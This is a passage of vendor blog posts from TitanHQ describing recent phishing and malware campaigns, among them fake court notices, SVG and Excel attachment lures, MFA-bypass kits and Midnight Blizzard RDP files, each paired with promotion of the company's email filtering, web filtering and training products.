encounter\r\nonline, via email, SMS, instant messaging services, and the phone. With TitanHQ’s SafeTitan security awareness\r\ntraining platform, it is easy to spin up training courses for employees to remind them to be vigilant and warn them\r\nabout seasonal and other cyber threats. The training platform makes it quick and easy to create and automate\r\ntraining courses, with the training delivered in modules of no more than 10 minutes to ensure employees can\r\nmaintain concentration and fit the training into their workflows. The SafeTitan platform also incorporates a\r\nphishing simulator, which businesses can use to reinforce training and identify individuals who are fooled by\r\nphishing scams and ensure they receive the additional training they need.\r\nDue to the high risk of phishing attacks, it is a good idea to implement an advanced spam filter service, one that\r\nreliably identifies and neutralizes phishing and business email compromise attempts and provides cutting-edge\r\nprotection against malware. You need look no further than SpamTitan for that protection. SpamTitan incorporates\r\nmachine learning and AI-based detection capabilities for detecting phishing, BEC, and scam emails, and dual\r\nantivirus engines and email sandboxing for detecting malware threats, including novel malware variants. In Q3,\r\nVirusBulletin’s tests of SpamTitan confirmed a phishing detection rate of 99.99% and a malware catch rate of\r\n99.511%. The interim figures for November 2024 are a 100% phishing catch rate and a 100% malware catch rate,\r\ndemonstrating the reliability of TitanHQ’s cloud-based email filtering solution.\r\nTitanHQ also offers online protection through the WebTitan DNS filter, which prevents access to known malicious\r\nwebsites, blocks malware downloads from the Internet, and can be used to control the web content employees can\r\naccess, providing an important extra layer of security against web-based threats. At TitanHQ we hope you have a\r\nhappy holiday period and above all else that you are well protected against cyber threats. Give the team a call\r\ntoday to find out more about how we can help protect your business this holiday season and beyond.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 35 of 136\n\nPhishing Campaign Targets Law Firms by Impersonating U.S. Federal Courts\r\nby G Hunt | November 30, 2024 | Phishing \u0026 Email Spam\r\nA phishing campaign has been identified that targets law firms by impersonating U.S. federal courts and purports\r\nto contain an electronic notice of court filings. Like many similar campaigns in recent months, the campaign aims\r\nto trick law firm employees into downloading malware that provides the threat actor with persistent access to the\r\nlaw firm’s network.\r\nThreat actors often target businesses, but a far more effective use of their time and resources is to target vendors. If\r\na threat actor gains access to a vendor’s network, they can potentially use the vendor’s privileged access to attack\r\nall downstream clients. Even when a vendor does not have privileged access to client networks, they are likely to\r\nstore large amounts of data from multiple clients. In the case of law firms, that data is highly sensitive and easily\r\nmonetized. It can be easily sold on darknet marketplaces and be used as leverage to extort the law firm and its\r\nclients.\r\nOver the last few years, law firms have been extensively targeted by threat actors for this very reason. According\r\nto a 2023 report from the UK’s National Cyber Security Centre, 65% of law firms have been a victim of a cyber\r\nincident and a 2024 report from the chartered accountancy firm Lubbock Fine indicates cyberattacks on law firms\r\nhave increased by 77% year-over-year. The main motivation for these attacks is extortion and ransomware attacks.\r\nThere has also been a surge in business email compromise (BEC) attacks on law firms, as they are typically\r\ninvolved in large financial transactions that threat actors can try to divert to their own accounts.\r\nOne of the latest campaigns seeks persistent access to the networks of law firms by tricking the firms into\r\ninstalling malware. The campaign came to light following multiple complaints about fake notices of electronic\r\ncourt filings, which prompted the U.S. federal judiciary to issue a warning to U.S. lawyers to be alert to email\r\nnotifications that purport to be notifications from the courts. The emails impersonate the PACER case\r\nmanagement and electronic case files system, and instruct the recipient to respond immediately. The judiciary\r\nadvised law firms to always check the federal judiciary’s official electronic filing system and never open\r\nattachments in emails or download files from unofficial sources.\r\nThe intercepted emails impersonate lower courts and prompt the recipient to click an embedded hyperlink to\r\naccess a document from a cloud-based repository. Clicking the link directs the user to a malicious website where\r\nthey are prompted to download a file. Opening the file triggers the installation of malware that will give the threat\r\nactor the access they need for an extensive compromise. The campaign will undoubtedly result in the theft of\r\nsensitive data and attempted extortion.\r\nMost law firms will be well aware that they are prime targets for threat actors and the importance of implementing\r\nrobust cybersecurity defenses. Since phishing is the most common way that threat actors get access to their\r\nnetworks and sensitive data, it is vital for law firms to ensure that they have an effective email security solution –\r\none that is capable of detecting and blocking malware and correctly classifying phishing and BEC emails. This is\r\nan area where TitanHQ can help. TitanHQ offers a suite of cutting-edge cybersecurity solutions that provide\r\nmultiple layers of protection against the most common attack vectors.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 36 of 136\n\nThe primary defense against phishing and BEC attacks is anti-spam software, which TitanHQ can provide as a\r\ncloud-based anti-spam service or virtual anti-spam appliance that can be installed on-premises on existing\r\nhardware. The SpamTitan solution incorporates dual anti-virus engines and email sandboxing for detecting\r\nmalware and malicious code in email attachments, even zero-day malware threats. The solution has machine\r\nlearning capabilities for detecting novel email threats such as phishing and BEC attacks that are needed to detect\r\nand block the latest AI-generated threats. In independent tests by Virus Bulletin in November 2024 on 125,000\r\nemails, SpamTitan had a 100% malware and phishing catch rate and only miscategorized 2 benign spam emails.\r\nIt is also important to ensure that all lawyers and support staff are made aware of the latest threats and receive\r\nregular cybersecurity awareness training. TitanHQ offers a comprehensive security awareness training platform\r\n(SafeTitan) and phishing simulator that makes it easy to create effective, ongoing training programs that\r\nincorporate training material on the latest threats. Give the TitanHQ team a call today for more information on\r\nthese and other cybersecurity solutions and for advice on improving your cybersecurity defenses against the most\r\ncommon attack vectors.\r\nSVG Image Files Being Used for Phishing and Malware Delivery\r\nby G Hunt | November 29, 2024 | Phishing \u0026 Email Spam\r\nCybercriminals are increasingly leveraging SVG files in their email campaigns. These file attachments have been\r\nused as part of convincing campaigns that have fooled many end users into disclosing their credentials or\r\ninstalling malware.\r\nSVG files, or Scalable Vector Graphics files to give them their full name, differ from standard image files such as\r\nBMP, JPG, and PNG files. Vector graphics are constructed using mathematical formulas that establish points on a\r\ngrid, rather than specific blocks of color (pixels). The advantage of vector graphics files is that they can be scaled\r\ninfinitely with no loss of resolution, something that cannot be done with pixel-based images. Vector files are often\r\nused for logos, as they can be scaled up easily to be used in billboards with no loss of resolution, and they are\r\nincreasingly being used on the web as the images will display correctly regardless of the size of the browser\r\nwindow or screen.\r\nSVG is an incredibly versatile file format that can incorporate elements other than the image code, for instance,\r\nSVG files can be used to display HTML. It is possible to create an SVG image file that incorporates HTML and\r\nexecutes JavaScript on loading, redirecting users to a malicious website such as a phishing landing page. Images\r\ncan be created that incorporate clickable download buttons, which will download payloads from a remote URL.\r\nAn end user could easily be tricked into downloading a file with a double extension that appears to be a PDF file\r\nbut is actually a malware executable.\r\nSome of the recently intercepted phishing emails have included an SVG file that displays an image of an Excel\r\nspreadsheet. Since the spreadsheet is an image, the user cannot interact with it, but it includes an embedded form\r\nthat mimics the Microsoft 365 login prompt. If the user enters their credentials into that form, they are transmitted\r\nto the threat actor. One of the problems with this type of file format is it is not generally blocked by anti-spam\r\nsoftware, so is likely to be delivered to inboxes.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 37 of 136\n\nWhile SVG and other vector graphics file formats are invaluable for design and can be found extensively on the\r\nweb, they are not generally used for image sharing, so the easiest way to protect against these malicious\r\ncampaigns is to configure your spam filtering service to block or quarantine emails containing SVG file\r\nattachments, at least for employees who do not usually work with these file formats. If you have a cloud-based\r\nanti-spam service that incorporates email sandboxing, where attachments are sent for deep analysis, it is possible\r\nto detect SVG files that incorporate malicious JavaScript. Since the use of these file formats is increasing, it is\r\nimportant to make your employees aware of the threat through security awareness training. Emails with SVG file\r\nattachments should also be incorporated into your phishing simulations to determine whether employees open\r\nthese files. Both are easy with the SafeTitan security awareness training and phishing simulation platform.\r\nDocuSign Abused in Massive Phishing Campaign\r\nby G Hunt | November 28, 2024 | Phishing \u0026 Email Spam\r\nA large-scale phishing campaign has been identified that abuses the e-signature software DocuSign, a hugely\r\npopular software solution used to legally and securely sign digital documents and eliminate the time-consuming\r\nprocess of manually signing documents.\r\nDocuSign uses “envelopes” to send documents to individuals for signing. These document containers may contain\r\none or more documents that need to be signed, and the envelopes are sent via email. In this campaign, a bad actor\r\nabuses the DocuSign Envelopes API to create fake invoices, which are mass-distributed via email. This campaign\r\naims to get the recipient of the invoice to sign it using DocuSign, then the signed document can be used for the\r\nnext phase of the scam, which typically involves sending the signed document to the billing department for\r\npayment, which may or may not be through DocuSign. The invoices generated for this campaign are based on\r\nlegitimate DocuSign templates and are generated through a legitimate DocuSign account. The invoices include\r\nlegitimate branding for DocuSign and the company/product the threat actor is impersonating – such as Norton\r\nInternet Security, PayPal, and other big-name brands.\r\nThe problem for businesses with this campaign is the emails are sent from the genuine docusign[.]net domain,\r\nwhich means email security solutions are unlikely to block the messages since the domain is trusted. Since the\r\nemails appear to be legitimate invoices with genuine branding and the correct invoice amount for the product\r\nbeing spoofed, end users are likely to be tricked by the emails. The tactics used in this campaign are similar to\r\nothers that have abused legitimate cloud-based services to bypass email security solutions, such as sending\r\nmalicious URLs in documents hosted on Google Docs and Microsoft SharePoint.\r\nThe primary defense against these campaigns is security awareness training. Businesses need to make their\r\nemployees aware of campaigns such as these messages, which often bypass email security solutions and are likely\r\nto land in inboxes since they may not contain any malicious URLs or malware code and are sent from a legitimate,\r\ntrusted domain. The workforce needs to be trained on cybersecurity best practices and told about the red flags in\r\nemails that are indicative of a scam. Training needs to be provided continuously to make employees aware of the\r\nlatest scams, as bad actors are constantly refining their tactics, techniques, and procedures, and developing new\r\nways to trick end users. The easiest way to do this is with a comprehensive security awareness training solution\r\nsuch as SafeTitan.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 38 of 136\n\nSafeTitan makes it easy to create training programs for different roles in the organization and automate these\r\ntraining programs to ensure training content is delivered in manageable chunks, with new content added and rolled\r\nout in response to the latest threats. These training programs should be augmented with phishing simulations. An\r\nemail security solution with AI and machine-learning capabilities is also important, as standard spam software is\r\nnot effective at identifying threats from legitimate and trusted cloud services. TitanHQ’s PhishTitan solution for\r\nMicrosoft 365 has these capabilities and identifies the phishing emails that Microsoft often misses. PhishTitan\r\nscans inbound messages for malicious content, uses email sandboxing for detecting zero-day threats, adds banners\r\nto emails from external sources, and allows security teams to rapidly remediate identified threats throughout the\r\nentire email environment. In November 2024, Virus Bulletin assessed the engine that powers the SpamTitan spam\r\nfiltering service and PhishTitan anti-phishing solution using around 125,000 emails. SpamTitan and PhishTitan\r\nblocked 100% of malware and 100% of phishing emails and only miscategorized 2 benign spam emails,\r\ndemonstrating how effective these solutions are at blocking malicious emails.\r\nFor more information on improving your defenses against malicious email campaigns through cutting-edge email\r\nsecurity and security awareness training, give the TitanHQ team a call today.\r\nMultifactor Authentication Can Give a False Sense of Security\r\nby G Hunt | November 26, 2024 | Phishing \u0026 Email Spam, Spam Software\r\nIt is all too easy to place too much reliance on multifactor authentication (MFA) to protect against phishing\r\nattacks. In theory, if an employee is duped by a phishing email and their credentials are stolen, MFA should stop\r\nthe threat actor from using those credentials to access the account, as they will not have the necessary additional\r\nauthentication factor(s). The reality is somewhat different. While MFA can – and does – block many attacks where\r\ncredentials have been obtained, it is far from infallible. MFA has made it much harder to compromise accounts\r\nbut, in response, threat actors have developed new tactics to bypass MFA protections.\r\nFor example, there is a scam where an employee is contacted by an individual who claims to be from their IT\r\ndepartment. The scammer tells them there is an issue with their account and they need to update their password.\r\nThey are directed to a site where they are prompted to enter their password and enter the MFA code sent to their\r\nphone. The threat actor uses that information in real-time to access their account. Multiple campaigns have\r\ntargeted IT helpdesk staff, with the threat actor impersonating an employee. They provide information to verify\r\ntheir identity (obtained in an earlier phase of the campaign) and ask to register a new device to receive their MFA\r\ncodes.\r\nPhishing-as-a-service toolkits (PhaaS) capable of defeating MFA are advertised on hacking forums and Telegram\r\nchannels that can be purchased or rented. They involve an adversary-in-the-middle (AitM) attack and use a\r\nreverse proxy between the victim and the legitimate portal for the credentials being sought. The user is directed to\r\na login page that appears exactly as expected, as the user is logging into the genuine site. What is unknown to the\r\nuser is the attacker sits between them and the site and captures credentials and the session cookie after MFA is\r\nsuccessfully navigated. The attacker then has access to the account for the duration of the session cookie and can\r\nregister a new device to receive future codes.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 39 of 136\n\nPhaaS kits are a serious threat and are proving popular with cybercriminals. Take the Rockstar 2FA kit for\r\nexample, which is advertised for $200 for a 2-week subscription. The kit includes everything a phisher needs,\r\nincluding MFA bypass, login pages for targeting specific credentials, session cookie harvesting, undetectable\r\nmalicious (FUD) links and link redirectors, a host of phishing templates, and an easy-to-use admin panel that\r\nallows tracking of phishing campaigns. The phishing URLs available are also hosted on legitimate services such\r\nas Google Docs Viewer, Microsoft OneDrive, and LiveAgent – sites commonly trusted by email security\r\nsolutions. This is just one phishing kit. There are many being offered with similar capabilities.\r\nThe take-home message is that MFA, while important, can be bypassed. For maximum protection, phishing-resistant multifactor authentication should be used – e.g. smartcards or FIDO security keys. These MFA tools can\r\nbe expensive to implement, so at the very least ensure that you have some form of MFA implemented and\r\nimplement several other layers of defenses. An advanced spam filtering service such as SpamTitan is essential, as\r\nit can block phishing emails to ensure they do not reach end users. Review sites often rate SpamTitan as one of the\r\nbest spam filters for business due to how easy the solution is to use and its excellent detection rate. In November\r\n2024, in tests by Virus Bulletin, SpamTitan blocked 100% of malware and 100% of phishing emails out of a test\r\ninvolving around 125,000 messages. Previous assessments had a catch rate of more than 99.99%, demonstrating\r\nthe reliability and accuracy of the solution.\r\nAnother layer of protection can be provided by a web filter, which will block attempts to visit known malicious\r\nwebsites, such as those used for phishing and malware distribution. WebTitan provides time-of-click protection, as\r\ndoes TitanHQ’s PhishTitan product – an anti-phishing solution specifically developed to protect M365 accounts\r\nagainst phishing by augmenting Microsoft’s controls to catch the phishing emails that EOP and Defender miss.\r\nTechnical defenses are important, but so too is workforce training. Through regular security awareness training\r\nand phishing simulations, employees can be taught cybersecurity best practices and how to identify and avoid\r\nscam emails. If you want to improve your defenses against phishing and malware, give the TitanHQ team a call\r\nand have a chat about your options. All TitanHQ solutions are easy to use, are available on a free trial, and full\r\nproduct support is provided during that trial.\r\nExcel File Attachments Used in Phishing Campaign to Deliver Fileless Remote\r\nAccess Trojan\r\nby G Hunt | November 15, 2024 | Phishing \u0026 Email Spam\r\nA phishing campaign has been identified that uses purchase order-related lures and Excel file attachments to\r\ndeliver the Remcos RAT, a commercially available malware variant that gives threat actors remote access to an\r\ninfected device.  The malware allows the threat actor to log keystrokes, record audio via the microphone, and take\r\nscreenshots and provides a foothold allowing an extensive compromise. Infection with the Remcos RAT\r\ninvariably involves data theft and could lead to a ransomware attack and extortion.\r\nBusinesses with antivirus software installed are unlikely to be protected. While antivirus software is effective at\r\ndetecting and neutralizing malware, the Remcos RAT is poorly detected as it is fileless malware that runs in\r\nmemory and does not install files on the disk. The campaign, detected by researchers at FortiGuard Labs, targets\r\nWindows users and starts with a phishing email with an encrypted Excel attachment. The emails purport to be a\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 40 of 136\n\npurchase order and include a malicious Excel file attachment. The Excel file uses OLE objects to exploit an old\r\nvulnerability in Office, tracked as CVE-2017-0199. Successful exploitation of the vulnerability will see an HTML\r\nApplication (HTA) file downloaded, which is launched using mshta.exe. The file is heavily obfuscated to evade\r\nsecurity solutions, and its function is to download and execute a binary, which uses process hollowing to\r\ndownload and run the Remcos RAT in the memory.\r\nThe Remcos RAT is used to enumerate and terminate processes, execute commands, capture sensitive data, and\r\ndownload additional malware payloads. Since the Remcos RAT runs in the memory, it will not survive a reboot.\r\nTo achieve persistence, it runs the registry editor (reg.exe) to edit the Windows Registry to add a new auto-run\r\nitem to ensure it is launched after each reboot.\r\nSince the initial contact is made via email, an advanced email security solution with email sandboxing and AI- and\r\nmachine learning capabilities should ensure the email is identified as malicious and blocked to prevent delivery.\r\nShould the email be delivered and the attachment opened, end users are informed that the document is protected.\r\nThey are presented with a blurred version of the Excel file and are told they need to enable editing to view the\r\ncontent – a red flag that should be identified by security-aware employees. If that red flag is missed, enabling\r\ncontent will trigger the exploitation of the vulnerability that ultimately delivers the Remcos RAT. Businesses with\r\nan advanced DNS-based web filter will have another layer of protection, as the URLs hosting the malicious files\r\nshould be blocked.\r\nTitanHQ offers cutting-edge cybersecurity solutions that provide exceptional protection against phishing, BEC,\r\nand malware attacks, blocking the initial emails and connections to malicious websites to prevent end users from\r\nviewing malicious emails (SpamTitan) and preventing malicious file downloads from the Internet (WebTitan). In\r\nNovember 2024 tests by Virus Bulletin, TitanHQ’s SpamTitan Solution had a 100% phishing and malware block\r\nrate. TitanHQ also provides a comprehensive security awareness training platform (SafeTitan) to teach\r\ncybersecurity best practices and keep employees aware of the latest threats. The platform also incorporates a\r\nphishing simulator for reinforcing training. Give the TitanHQ team a call today for more information on TitanHQ\r\nsolutions and how they can improve your defenses against email, web, SMS, and voice-based threats at your\r\nbusiness.\r\nA Russian APT Group is Conducting a Massive Spear Phishing Campaign\r\nby G Hunt | October 31, 2024 | Phishing \u0026 Email Spam\r\nThe notorious Russian advanced persistent threat (APT) group Midnight Blizzard (aka Cozy Bear, APT29) has\r\nbeen conducting a massive spear phishing campaign on targets in the United Kingdom, Europe, Australia, and\r\nJapan. Midnight Blizzard is a hacking group with strong links to Russia’s Foreign Intelligence Service (SVR)\r\nwhich engages in espionage of foreign interests and seeks persistent access to accounts and devices to steal\r\ninformation of interest to the SVR. The latest campaign is a highly targeted information-gathering exercise that\r\nwas first observed on October 22, 2024.\r\nWhile Midnight Blizzard’s spear phishing attacks are usually conducted on government officials and individuals\r\nin non-governmental organizations (NGOs), individuals in academia and other sectors have also been\r\ntargeted. The spear phishing attacks were identified by Microsoft Threat Intelligence which reports that thousands\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 41 of 136\n\nof emails have been sent to more than 100 organizations and the campaign is ongoing. While spear phishing is\r\nnothing new, Midnight Blizzard has adopted a new tactic in these attacks and is sending a signed Remote Desktop\r\nProtocol (RDP) configuration file as an email attachment, with a variety of lures tailored to the individual being\r\ntargeted. Some of the intercepted emails impersonated Microsoft, others impersonated cloud service providers,\r\nand several of the emails used lures related to zero trust. The email addresses used in this campaign have been\r\npreviously compromised in other Midnight Blizzard campaigns.\r\nAmazon has also reported that it detected phishing emails that impersonated Amazon Web Services (AWS),\r\nattempting to trick the recipients into thinking AWS domains were used; however, the campaign did not seek AWS\r\ncredentials, as Midnight Blizzard is targeting Windows credentials. Amazon immediately started the process of\r\nseizing the domains used by Midnight Blizzard to impersonate AWS and that process is ongoing.\r\nRDP files contain automatic settings and resource mappings and are created when a successful connection to an\r\nRDP server occurs. The attached RDP files are signed with a Lets Encrypt certificate and extend features and\r\nresources of the local system to a remote server under the attacker’s control. If the RDP file is executed, a\r\nconnection is made to a server under the control of Midnight Blizzard, and the targeted user’s local device’s\r\nresources are bidirectionally mapped to the server.\r\nThe server is sent resources including logical hard disks, clipboard contents, printers, connected devices,\r\nauthentication features, and Windows operating system facilities. The connection allows the attacker to install\r\nmalware, which is set to execute via AutoStart folders, steal credentials, and download other tools to the user’s\r\ndevice, including remote access trojans to ensure that access to the targeted system is maintained when the RDP\r\nsession is closed.\r\nSince the emails were sent using email addresses at legitimate organizations, they are unlikely to be flagged as\r\nmalicious based on reputation checks by anti-spam software, although may be detected by more advanced anti-spam services that incorporate machine learning and AI-based detection mechanisms and email sandboxing. You\r\nshould configure your spam antivirus filter to block emails containing RDP files and other executable files and\r\nconfigure your firewall to block outbound RDP connection attempts to external or public networks. Multifactor\r\nauthentication should be configured on all accounts to prevent compromised credentials from granting access, and\r\nconsider blocking executable files from running via your endpoint security software is the executable file is not on\r\na trusted list. Also, ensure that downloaded files are scanned using antivirus software. A web filter can provide\r\nadded protection against malicious file downloads from the internet.\r\nAn anti-phishing solution should also be considered for augmenting the protection provided through Microsoft\r\nDefender and EOP for Microsoft 365. PhishTitan from TitanHQ has been shown to improve protection and block\r\nthreats that Microsoft’s anti-phishing solution fails to detect, augmenting rather than replacing the protection\r\nprovided by EOP and Defender. It is also important to provide security awareness training to the workforce and\r\nensure that spear phishing and RDP file attachments are included in the training. Also, consider conducting spear\r\nphishing simulations.\r\nMalvertising Campaign Uses Facebook Ads to Deliver SYS01 Information Stealer\r\nby G Hunt | October 30, 2024 | Internet Security\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 42 of 136\n\nA new malvertising campaign has been identified that abuses the Meta advertising platform to deliver an\r\ninformation stealer malware variant called SYS01 Stealer. Similar to other malvertising campaigns, popular\r\nbrands are impersonated to trick users into downloading the information stealer in the belief they are installing\r\nlegitimate software. In this campaign, the impersonated brands include popular software tools that are commonly\r\nused by businesses, including the video and imaging editing tools CapCut, Adobe Photoshop, and Canva, as well\r\nas productivity tools such as Office 365, instant messaging platforms such as Telegram, VPN providers such as\r\nExpress VPN, and a host of other software products and services to ensure a wide reach, including video games\r\nand streaming services.\r\nThe adverts claim that these software solutions games and services are available free of charge, which is a red flag\r\nas the genuine products and services usually require a purchase or subscription. The advertisements are published\r\nvia hijacked Facebook business accounts, which according to an analysis by Bitdefender, have been used to create\r\nthousands of ads on the platform, many of which remain active for months. If a user interacts with one of the\r\nadverts, they are directed to sites hosted on Google Sites or True Hosting. Those sites impersonate trusted brands\r\nand offer the application indicated in the initial ad. If the user is tricked and progresses to a download, a zip file is\r\ndelivered that contains an executable file that sideloads a malicious DLL, which launches the infection process.\r\nThe DLL will run PowerShell commands that will prevent the malware from executing in sandboxes and will\r\nprepare the environment for the malware to be installed, including disabling security solutions to ensure the\r\nmalware is not detected, and maintaining persistence ensured through scheduled tasks. Some identified samples\r\ninclude an Electron application with JavaScript code embedded that drops and executes the malware.\r\nThe cybercriminals behind the campaign respond to detections of the malware by security solutions and change\r\nthe code when the malware starts to be blocked, with the new variant rapidly pushed out via Facebook ads. The\r\ninformation stealer primarily targets Facebook business accounts and steals credentials allowing those accounts to\r\nbe hijacked. Personal data is stolen, and the accounts are used to launch more malicious ads. Since legitimate\r\nFacebook business accounts are used, the attackers can launch malicious ads at scale without arousing\r\nsuspicion. This malvertising campaign stands out due to its scale, with around 100 malicious domains currently\r\nused for malware distribution and command and control operations.\r\nBusinesses should take steps to ensure they are protected by using a web filter to block the malicious domains\r\nused to distribute the malware, the Facebook site for employees, and to prevent malware downloads from the\r\nInternet. Since business Facebook accounts are targeted, it is important to ensure that 2-factor authentication is\r\nenabled in the event of credentials being compromised and business Facebook accounts should be monitored for\r\nunauthorized access. Business users should not install any software unless it comes from an official source, which\r\nshould be reinforced through security awareness training.\r\nTitanHQ has developed an easy-to-use web filter called WebTitan that is constantly updated with threat\r\nintelligence to block access to malicious sites as soon as they are discovered. WebTitan can be configured to block\r\ncertain file downloads from the Internet by extension to reduce the risk of malware infections and control shadow\r\nIT, and WebTitan makes it easy for businesses to enhance productivity while improving security by blocking\r\naccess to known distractions such as social media platforms and video streaming sites. WebTitan provides real-time protection against clicks in phishing emails by preventing a click from launching a malicious website and the\r\nsolution can be used to protect all users on the network as well as off-network users on portable devices through\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 43 of 136\n\nthe WebTitan on-the-go roaming agent. For more information about improving your defenses against malware\r\ndelivered via the internet and malvertising campaigns, give the TitanHQ team a call today.\r\nTitanHQ Launches Security Awareness Training for MSPs\r\nby G Hunt | October 26, 2024 | Security Awareness\r\nManaged service providers can implement security solutions to protect their clients from phishing, social\r\nengineering, and business email compromise attacks but if a malicious email manages to bypass those defenses, it\r\ncould easily result in hackers gaining a foothold in the network, resulting in a highly disruptive and costly\r\ncyberattack and data breach. To improve defenses against phishing, managed service providers should offer their\r\nclients security awareness training to manage human risk, and now TitanHQ can offer a security awareness\r\ntraining (SAT) solution that allows them to do that with ease.\r\nThis month, TitanHQ launched its Security Awareness Training (SAT) solution for MSPs. The solution has been\r\nspecifically created to be used by MSPs and allows them to provide affordable, scalable training with minimal\r\nsetup. The training platform has now been integrated with TitanHQ’s MSP cybersecurity platform and is ready for\r\nMSPs to use. In contrast to many SAT solutions that only provide standard cybersecurity training, TitanHQ’s SAT\r\nsolution integrates advanced phishing simulation with behavior-focused training that is fun and engaging for\r\nparticipants. The solution delivers maximum value to MSPs and can be rapidly set up, allowing them to roll out\r\ntraining programs to new clients with just a few clicks. There is no need to spend hours assigning training content\r\nto new customers, as it is possible to select multiple customers and rapidly spin up training courses that can be\r\nrapidly deployed for individuals or groups of customers in the future.\r\nThe AI-driven training platform allows training content to be tailored to individual employees to meet their\r\ntraining needs, personalizing the training experience. The platform includes more than 80 videos, training\r\nsessions, and webinars to improve awareness and help create a security culture. MSPs are provided with monthly\r\nreports on the progress that is being made by individual employees and they are provided with actionable insights.\r\nThe platform includes a phishing simulator that allows MSPs to conduct real-time phishing simulations based on a\r\nhuge variety of templates (1,800+) covering all types of phishing and other attack scenarios, and the content is\r\nupdated regularly to include the latest tactics, techniques, and procedures used by cybercriminals in real-world\r\nphishing campaigns. MSPs can easily pre-configure phishing simulations and training campaigns to roll out to\r\nnew clients as they are onboarded, and the MSP dashboard provides a view of quick actions and live analytics all\r\nin one place.\r\nThe training platform can deliver reactive training in response to user behavior, where users in need of training are\r\nautomatically enrolled and delivered relevant training content. MSPs can use the platform to conduct cyber\r\nawareness knowledge checks to identify areas where individuals need training, verify understanding of the\r\ntraining material, and retest employees over time to ensure they have not forgotten the material from previous\r\ntraining sessions. The training material covers the cyber threats that employees are likely to encounter such as\r\nphishing, social engineering, business email compromise, and malware, but also in-person threats such as physical\r\nsecurity, ensuring they receive comprehensive training that covers all the bases.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 44 of 136\n\nIf you have yet to start offering security awareness training to your clients, or if you already offer training but\r\nrequire a more comprehensive and easier-to-use training platform, give the TitanHQ team a call. Product\r\ndemonstrations can be arranged on request to show you just how easy the platform is to use.\r\n“Our integrated cybersecurity platform delivers maximum value to MSPs, offering a quicker time-to-market,\r\nreduced set-up requirements combined with real-world, practical security awareness training \u0026 phishing\r\nsimulations. TitanHQ delivers that seamlessly, allowing MSPs to offer comprehensive SAT to their customers in\r\njust a few clicks,” said TitanHQ CEO, Ronan Kavanagh.\r\nMultiple Accounts Compromised in Targeted Phishing Campaigns\r\nby G Hunt | October 26, 2024 | Phishing \u0026 Email Spam\r\nThe purpose of phishing attacks is usually to steal credentials to gain unauthorized access to accounts. If an\r\nemployee falls for a phishing attack and their credentials are obtained, the attacker can gain access to that user’s\r\naccount and any data contained therein. That access can be all that is required for the threat actor to achieve a\r\nmuch more extensive compromise.\r\nOftentimes, a threat actor conducts a more extensive phishing campaign on multiple employees at the same\r\norganization. These phishing attacks can be harder to spot as they have been tailored to that specific organization.\r\nThese attacks usually spoof an internal department with the emails seemingly sent from a legitimate internal email\r\naccount. The emails may address each individual by name, or appear to be broadcast messages to staff\r\nmembers. One successful campaign was identified by the Office of Information Technology at Boise State\r\nUniversity, although not before several employees responded to the emails and disclosed their credentials. In this\r\ncampaign, the emails were addressed to “Dear Staff,” and appeared to have been sent from the postmaster account\r\nby “Health Services,” purporting to be an update on workplace safety. The emails had the subject line “Workplace\r\nSafety: Updates on Recent Health Developments,” with a similar campaign indicating a campylobacter infection\r\nhad been reported to the health department.\r\nIn the message, recipients were advised about a health matter involving a member of staff, advising them to\r\ncontact the Health Service department if they believed they had any contact with the unnamed worker.  In order to\r\nfind out if they had any contact with the worker, the link must be clicked. The link directed the user to a fraudulent\r\nlogin page on an external website, where they were required to enter their credentials. The login page had been\r\ncreated to look like it was a legitimate Boise State University page, captured credentials, and used a Duo Securit\r\nnotification to authorize access to their account.\r\nThese targeted campaigns are now common, especially at large organizations where it is possible to compromise a\r\nsignificant number of accounts and is worth the attacker’s time to develop a targeted campaign. Another attack\r\nwas recently identified by the state of Massachusetts. The attacker created a fake website closely resembling the\r\nHR/CMS Employee Self-Service Time and Attendance (SSTA) system, which is used for payroll. Employees were\r\ntricked into visiting the portal and were prompted to enter their credentials, which the attacker used to access their\r\npersonal and direct deposit information. In this case, the aim of the attack appeared to be to change direct deposit\r\ninformation to have the employees’ wages paid into the attacker’s account. Several employees were fooled by the\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 45 of 136\n\nscam; although in this case the attack was detected promptly and the SSTA system was disabled to prevent\r\nfraudulent transfers.\r\nA different type of campaign recently targeted multiple employees via email, although the aim of the attack was to\r\ngrant the threat actor access to the user’s device by convincing them to install the legitimate remote access\r\nsolution, AnyDesk. The threat actor, the Black Basta ransomware group, had obtained employee email addresses\r\nand bombarded them with spam emails, having signed them up for newsletters via multiple websites. The aim was\r\nto create a legitimate reason for the next phase of the attack, which occurred via the telephone, although the group\r\nhas also been observed using Microsoft Teams to make contact. The threat actor posed as the company’s IT help\r\ndesk and offered assistance resolving the spam problem they created, which involved downloading AnyDesk and\r\ngranting access to their device. During the session, tools are installed to provide persistent access. The threat actor\r\nthen moved laterally within the network and extensively deployed ransomware.\r\nThese attacks use social engineering to exploit human weaknesses. In each of these attacks, multiple red flags\r\nshould have been spotted revealing these social engineering attempts for what they are but more than one\r\nemployee failed to spot them. It is important to provide security awareness training to the workforce to raise\r\nawareness of phishing and social engineering threats, and for training to be provided regularly. Training should\r\ninclude the latest tactics used by threat actors to breach networks, including phishing attacks, fake tech support\r\ncalls, malicious websites, smishing, and vishing attacks.\r\nA phishing simulator should be used to send realistic but fake phishing emails internally to identify employees\r\nwho fail to spot the red flags. They can then receive additional training relative to the simulation they failed. By\r\nproviding regular security awareness training and conducting phishing simulations, employers can develop a\r\nsecurity culture. While it may not be possible to prevent all employees from responding to a 